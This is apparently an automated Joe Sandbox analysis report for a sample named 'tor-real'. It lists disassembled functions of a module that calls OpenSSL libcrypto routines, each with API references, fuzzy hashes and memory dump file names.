                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: X_ctrl$R_put_errorX_freeX_new_idY_deriveY_derive_init
                                                                            • String ID: #$&$D$D$P
                                                                            • API String ID: 1049034017-2133515852
                                                                            • Opcode ID: 3b37ad816f32b09440a267c1b2bf236610a8333952a0d540bc313a20d2d16084
                                                                            • Instruction ID: c3d3f4f6bf7c14630dcbb858e56b3d1d6457799c01355a98ca369d834c57d952
                                                                            • Opcode Fuzzy Hash: 3b37ad816f32b09440a267c1b2bf236610a8333952a0d540bc313a20d2d16084
                                                                            • Instruction Fuzzy Hash: DB71E4B15493429FE300DF65D54434BFBE0AB88758F108A2DE5E88B790DBB9D8498F92
                                                                            Function 6C0BA447 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 143COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • d2i_RSAPrivateKey.LIBCRYPTO-1_1 ref: 6C0BA483
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0BA4E9
                                                                              • Part of subcall function 6C0BA1C0: EVP_PKEY_new.LIBCRYPTO-1_1 ref: 6C0BA1CD
                                                                              • Part of subcall function 6C0BA1C0: RSA_up_ref.LIBCRYPTO-1_1 ref: 6C0BA1DF
                                                                              • Part of subcall function 6C0BA1C0: EVP_PKEY_assign.LIBCRYPTO-1_1 ref: 6C0BA1F3
                                                                              • Part of subcall function 6C0BA1C0: EVP_PKEY_free.LIBCRYPTO-1_1 ref: 6C0BA214
                                                                            • RSA_free.LIBCRYPTO-1_1 ref: 6C0BA49F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: A_freeA_up_refPrivateR_put_errorY_assignY_freeY_newd2i_
                                                                            • String ID: C
                                                                            • API String ID: 2045331235-1037565863
                                                                            • Opcode ID: f26fb0dd28269cf4ba28b64e2a9de7349cdabbc78fc970911634586c04ac683b
                                                                            • Instruction ID: 1d6b95848871531c1cc4228fcc4f5f6096715e3ba2d7d1cc2fb3a77033bb6ac8
                                                                            • Opcode Fuzzy Hash: f26fb0dd28269cf4ba28b64e2a9de7349cdabbc78fc970911634586c04ac683b
                                                                            • Instruction Fuzzy Hash: 055126B45083029FD710DF28C184B9ABBF0BF88308F958D2DE4D99B710DB79E5488B92
                                                                            Function 6C0A6790 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 116COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • OPENSSL_sk_set_cmp_func.LIBCRYPTO-1_1 ref: 6C0A67BD
                                                                            • BIO_s_file.LIBCRYPTO-1_1 ref: 6C0A67C6
                                                                            • BIO_new.LIBCRYPTO-1_1 ref: 6C0A67CE
                                                                            • BIO_free.LIBCRYPTO-1_1 ref: 6C0A6899
                                                                            • X509_free.LIBCRYPTO-1_1 ref: 6C0A68A5
                                                                            • OPENSSL_sk_set_cmp_func.LIBCRYPTO-1_1 ref: 6C0A68B5
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0A68FF
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: L_sk_set_cmp_func$O_freeO_newO_s_fileR_put_errorX509_free
                                                                            • String ID: A
                                                                            • API String ID: 635701306-3554254475
                                                                            • Opcode ID: 780d38348b9a3436c8eb2e94349f01cc84d04760e8905f0c80749761107a7485
                                                                            • Instruction ID: 8518b7971c6a7bf643c1e2ca809b895f0f9722a835c813a537cf25f05c4c4666
                                                                            • Opcode Fuzzy Hash: 780d38348b9a3436c8eb2e94349f01cc84d04760e8905f0c80749761107a7485
                                                                            • Instruction Fuzzy Hash: 4B4103B15083059FC710AFA9C484B9EBBF4BF89308F818C1DE598A7700D774E5498F96
                                                                            Function 6C0A2780 Relevance: 27.3, APIs: 18, Instructions: 328COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • EVP_sha256.LIBCRYPTO-1_1 ref: 6C0A278F
                                                                            • OPENSSL_sk_num.LIBCRYPTO-1_1 ref: 6C0A2A0E
                                                                            • OPENSSL_sk_value.LIBCRYPTO-1_1 ref: 6C0A2A22
                                                                            • OPENSSL_sk_num.LIBCRYPTO-1_1 ref: 6C0A2B8D
                                                                            • OPENSSL_sk_value.LIBCRYPTO-1_1 ref: 6C0A2BA9
                                                                            • OPENSSL_sk_num.LIBCRYPTO-1_1 ref: 6C0A2BBE
                                                                            • OPENSSL_sk_value.LIBCRYPTO-1_1 ref: 6C0A2BE3
                                                                            • OPENSSL_sk_new_reserve.LIBCRYPTO-1_1 ref: 6C0A2C00
                                                                            • OPENSSL_sk_push.LIBCRYPTO-1_1 ref: 6C0A2C1F
                                                                            • OPENSSL_sk_value.LIBCRYPTO-1_1 ref: 6C0A2C67
                                                                            • OPENSSL_sk_push.LIBCRYPTO-1_1 ref: 6C0A2C80
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: L_sk_value$L_sk_num$L_sk_push$L_sk_new_reserveP_sha256
                                                                            • String ID:
                                                                            • API String ID: 2750470393-0
                                                                            • Opcode ID: d310160ff2441a509d45625bf035cdfcb105de9887ea23c8cb35cf890ae6f84b
                                                                            • Instruction ID: 355e6af070c78c0c9e692031911c00e8c32f81c3d08430ebe845ad7b59fb6dc2
                                                                            • Opcode Fuzzy Hash: d310160ff2441a509d45625bf035cdfcb105de9887ea23c8cb35cf890ae6f84b
                                                                            • Instruction Fuzzy Hash: 8ED15C7060A3058FD354DFE6C18875ABBE0BF88708F55497DE8988BB12D774E986CB42
                                                                            Function 6C0B6400 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 127COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • OPENSSL_sk_num.LIBCRYPTO-1_1 ref: 6C0B6454
                                                                            • OPENSSL_sk_num.LIBCRYPTO-1_1 ref: 6C0B6473
                                                                            • CT_POLICY_EVAL_CTX_new.LIBCRYPTO-1_1 ref: 6C0B6495
                                                                            • OPENSSL_sk_value.LIBCRYPTO-1_1 ref: 6C0B64B5
                                                                            • CT_POLICY_EVAL_CTX_set1_cert.LIBCRYPTO-1_1 ref: 6C0B64C3
                                                                            • CT_POLICY_EVAL_CTX_set1_issuer.LIBCRYPTO-1_1 ref: 6C0B64CF
                                                                            • CT_POLICY_EVAL_CTX_set_shared_CTLOG_STORE.LIBCRYPTO-1_1 ref: 6C0B64E7
                                                                            • CT_POLICY_EVAL_CTX_set_time.LIBCRYPTO-1_1 ref: 6C0B650E
                                                                            • SCT_LIST_validate.LIBCRYPTO-1_1 ref: 6C0B6524
                                                                            • CT_POLICY_EVAL_CTX_free.LIBCRYPTO-1_1 ref: 6C0B657F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: L_sk_num$L_sk_valueT_validateX_freeX_newX_set1_certX_set1_issuerX_set_shared_X_set_time
                                                                            • String ID: A$P
                                                                            • API String ID: 866506662-345673399
                                                                            • Opcode ID: 46363b3dfb7cb50b780239a6c2ed8fa9c79d4e78301ff71a3435b6963b6036eb
                                                                            • Instruction ID: f1432a9e34abbd6c63a7a1765b3d0a987d9bb6c799de26f675d3cdf57275e2d8
                                                                            • Opcode Fuzzy Hash: 46363b3dfb7cb50b780239a6c2ed8fa9c79d4e78301ff71a3435b6963b6036eb
                                                                            • Instruction Fuzzy Hash: 5E5159B06087018FD700DF24C58439EBBE4AF89758F508D2EE888EBB45DB76E4448B92
                                                                            Function 6C0C6510 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 320COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: D$P
                                                                            • API String ID: 0-307317852
                                                                            • Opcode ID: f903c7c891cca04a7a71cc352f1dc2a18da0be7862d0db058c5e5c305ccba88d
                                                                            • Instruction ID: 078b0cca7f1146ca5c612dbb75462ceaccc0dead9a111d77bffd186e6ee5e9db
                                                                            • Opcode Fuzzy Hash: f903c7c891cca04a7a71cc352f1dc2a18da0be7862d0db058c5e5c305ccba88d
                                                                            • Instruction Fuzzy Hash: FAD120B06093019FD320DF25C5847AEBBE1BB89748F608A2DE4989B740E775E548CF93
                                                                            Function 6C0BA6C0 Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 89COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • BIO_s_file.LIBCRYPTO-1_1 ref: 6C0BA6CA
                                                                            • BIO_new.LIBCRYPTO-1_1 ref: 6C0BA6D2
                                                                            • BIO_ctrl.LIBCRYPTO-1_1(?,?,?,?,?,?,?,6C0AAD12), ref: 6C0BA6FC
                                                                            • d2i_PrivateKey_bio.LIBCRYPTO-1_1(?,?,?,?,?,?,?,6C0AAD12), ref: 6C0BA722
                                                                            • EVP_PKEY_free.LIBCRYPTO-1_1(?,?,?,?,?,?,?,6C0AAD12), ref: 6C0BA74C
                                                                            • ERR_put_error.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,6C0AAD12), ref: 6C0BA781
                                                                            • BIO_free.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,6C0AAD12), ref: 6C0BA789
                                                                            • ERR_put_error.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,6C0AAD12), ref: 6C0BA7C9
                                                                            • PEM_read_bio_PrivateKey.LIBCRYPTO-1_1(?,?,?,?,?,?,?,6C0AAD12), ref: 6C0BA7F1
                                                                            • ERR_put_error.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,6C0AAD12), ref: 6C0BA831
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: R_put_error$Private$Key_bioM_read_bio_O_ctrlO_freeO_newO_s_fileY_freed2i_
                                                                            • String ID: l$|
                                                                            • API String ID: 2673981590-383203303
                                                                            • Opcode ID: 423f8f54605c3bfcea4e681cf9d4555e69e58312a93ea17871381273b6aa2d71
                                                                            • Instruction ID: c98e287ce478248a74801a9ba9c29c5ba68ccea9a7bfd71c36c5fc76527b4211
                                                                            • Opcode Fuzzy Hash: 423f8f54605c3bfcea4e681cf9d4555e69e58312a93ea17871381273b6aa2d71
                                                                            • Instruction Fuzzy Hash: BD31E7B554D305AFD300EF69C44875FBBE0AF88348F11891DE4D89BB50D7B9D9448B86
                                                                            Function 6C0D07D0 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 236COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ENGINE_load_ssl_client_cert.LIBCRYPTO-1_1 ref: 6C0D0868
                                                                            • X509_free.LIBCRYPTO-1_1 ref: 6C0D08B2
                                                                            • EVP_PKEY_free.LIBCRYPTO-1_1 ref: 6C0D08BE
                                                                            • X509_free.LIBCRYPTO-1_1 ref: 6C0D0A39
                                                                            • EVP_PKEY_free.LIBCRYPTO-1_1 ref: 6C0D0A45
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: X509_freeY_free$E_load_ssl_client_cert
                                                                            • String ID: )$D$P
                                                                            • API String ID: 3987155115-3367180111
                                                                            • Opcode ID: b6f4319aef523b2b3e135b1643ccedfac460afcc46bacd8df82209384ba329cf
                                                                            • Instruction ID: 92e8cbb31ab4150a2ee5d6aeda3e65ef0b127d70cd0cff4bd2ba5e9e0a4a275d
                                                                            • Opcode Fuzzy Hash: b6f4319aef523b2b3e135b1643ccedfac460afcc46bacd8df82209384ba329cf
                                                                            • Instruction Fuzzy Hash: 6FB125B060D3418FD7009F29C58475EBBE0AF8931CF52896DE8989B751D775E9488F82
                                                                            Function 6C0B8500 Relevance: 21.1, APIs: 14, Instructions: 107COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • X509_get0_pubkey.LIBCRYPTO-1_1 ref: 6C0B8518
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0B8627
                                                                              • Part of subcall function 6C0A7170: EVP_PKEY_id.LIBCRYPTO-1_1 ref: 6C0A717A
                                                                            • EVP_PKEY_copy_parameters.LIBCRYPTO-1_1 ref: 6C0B855E
                                                                            • ERR_clear_error.LIBCRYPTO-1_1 ref: 6C0B8563
                                                                            • X509_check_private_key.LIBCRYPTO-1_1 ref: 6C0B857A
                                                                            • X509_free.LIBCRYPTO-1_1 ref: 6C0B8591
                                                                            • X509_up_ref.LIBCRYPTO-1_1 ref: 6C0B8599
                                                                            • EVP_PKEY_get0_EC_KEY.LIBCRYPTO-1_1 ref: 6C0B8633
                                                                            • EC_KEY_can_sign.LIBCRYPTO-1_1 ref: 6C0B863B
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0B8677
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: R_put_error$R_clear_errorX509_check_private_keyX509_freeX509_get0_pubkeyX509_up_refY_can_signY_copy_parametersY_get0_Y_id
                                                                            • String ID:
                                                                            • API String ID: 2049276590-0
                                                                            • Opcode ID: 0d19b418c7b5d03d654ea0807f8acda27fe57c74a1a7e176193c495b0f0eb653
                                                                            • Instruction ID: 38a3294eba1b708cbf89181edd8167fba76a21072fe5d7e7623d3e3ce4cedcb5
                                                                            • Opcode Fuzzy Hash: 0d19b418c7b5d03d654ea0807f8acda27fe57c74a1a7e176193c495b0f0eb653
                                                                            • Instruction Fuzzy Hash: B9414AB05083469FD710DF28C480BAEBBF4AF88308F81891DE4949B760EB35E549CB92
                                                                            Function 6C0A8730 Relevance: 18.1, APIs: 12, Instructions: 75COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • OPENSSL_sk_dup.LIBCRYPTO-1_1 ref: 6C0A8744
                                                                            • OPENSSL_sk_num.LIBCRYPTO-1_1 ref: 6C0A8784
                                                                            • OPENSSL_sk_num.LIBCRYPTO-1_1 ref: 6C0A87BA
                                                                            • OPENSSL_sk_dup.LIBCRYPTO-1_1 ref: 6C0A87C6
                                                                            • OPENSSL_sk_free.LIBCRYPTO-1_1 ref: 6C0A87DA
                                                                            • OPENSSL_sk_set_cmp_func.LIBCRYPTO-1_1 ref: 6C0A87EC
                                                                            • OPENSSL_sk_sort.LIBCRYPTO-1_1 ref: 6C0A87F6
                                                                            • OPENSSL_sk_free.LIBCRYPTO-1_1 ref: 6C0A8801
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: L_sk_dupL_sk_freeL_sk_num$L_sk_set_cmp_funcL_sk_sort
                                                                            • String ID:
                                                                            • API String ID: 2546459316-0
                                                                            • Opcode ID: 2bdf3c0b41e0ad0810182e477dbbae690a0683f1dfb988892a5f35defb13bd54
                                                                            • Instruction ID: 7143489c9f7a525c73df1287795360890cdf3f7fd14814cbbdc71dc1bf71c232
                                                                            • Opcode Fuzzy Hash: 2bdf3c0b41e0ad0810182e477dbbae690a0683f1dfb988892a5f35defb13bd54
                                                                            • Instruction Fuzzy Hash: B2213CB09487418FD300BFA5D48036EBBF5EF8C258F61492EE5888B702E734E5858F92
                                                                            Function 6C09ADD3 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 169COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • EVP_CIPHER_CTX_cipher.LIBCRYPTO-1_1 ref: 6C09AE17
                                                                            • EVP_CIPHER_CTX_block_size.LIBCRYPTO-1_1 ref: 6C09AE3C
                                                                            • EVP_Cipher.LIBCRYPTO-1_1(?), ref: 6C09AE8F
                                                                            • EVP_MD_CTX_md.LIBCRYPTO-1_1(?), ref: 6C09AEA9
                                                                            • EVP_MD_CTX_md.LIBCRYPTO-1_1(?), ref: 6C09AEC3
                                                                            • EVP_MD_size.LIBCRYPTO-1_1(?), ref: 6C09AECB
                                                                            • memmove.MSVCRT ref: 6C09AF2A
                                                                            • memset.MSVCRT ref: 6C09AF6F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: X_md$CipherD_sizeX_block_sizeX_ciphermemmovememset
                                                                            • String ID: D$P
                                                                            • API String ID: 261467796-307317852
                                                                            • Opcode ID: 646489b420c8878dd8f69d59a39c316a2b55ed86d8c758dff7a66a8675bd42a7
                                                                            • Instruction ID: 5520b9c9be1c557a5b7d537dd0342b9e10b6a8cc515a30f7a5ac504b56dd4c43
                                                                            • Opcode Fuzzy Hash: 646489b420c8878dd8f69d59a39c316a2b55ed86d8c758dff7a66a8675bd42a7
                                                                            • Instruction Fuzzy Hash: 15519C71A093508FD704CF69C48471BBBE1AF88318F29896DEC98CBB45D774E8859B92
                                                                            Function 6C0B0850 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 125COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ASYNC_get_current_job.LIBCRYPTO-1_1 ref: 6C0B08A8
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0B0900
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0B0933
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
